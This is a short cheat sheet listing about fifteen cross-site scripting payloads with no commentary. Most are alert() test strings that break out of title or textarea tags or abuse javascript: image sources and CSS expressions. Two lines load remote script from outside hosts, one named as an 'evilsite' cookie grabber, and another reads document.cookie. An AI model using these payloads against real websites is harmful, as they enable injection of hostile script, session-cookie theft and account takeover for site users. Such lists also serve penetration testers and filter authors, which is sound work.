XSS Cheat Sheet


  • <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  • "><script>alert(0)</script>
  • <script src=http://yoursite.com/your_files.js></script>
  • </title><script>alert(/xss/)</script>
  • </textarea><script>alert(/xss/)</script>
  • <IMG LOWSRC=\"javascript:alert('XSS')\">
  • <IMG DYNSRC=\"javascript:alert('XSS')\">
  • <font style='color:expression(alert(document.cookie))'>
  • <img src="javascript:alert('XSS')">
  • <script language="JavaScript">alert('XSS')</script>
  • [url=javascript:alert('XSS');]click me[/url]
  • <body onunload="javascript:alert('XSS');">
  • <script>alert(1);</script>
  • <script>alert('XSS');</script>
  • <script src="http://www.evilsite.org/cookiegrabber.php"></script>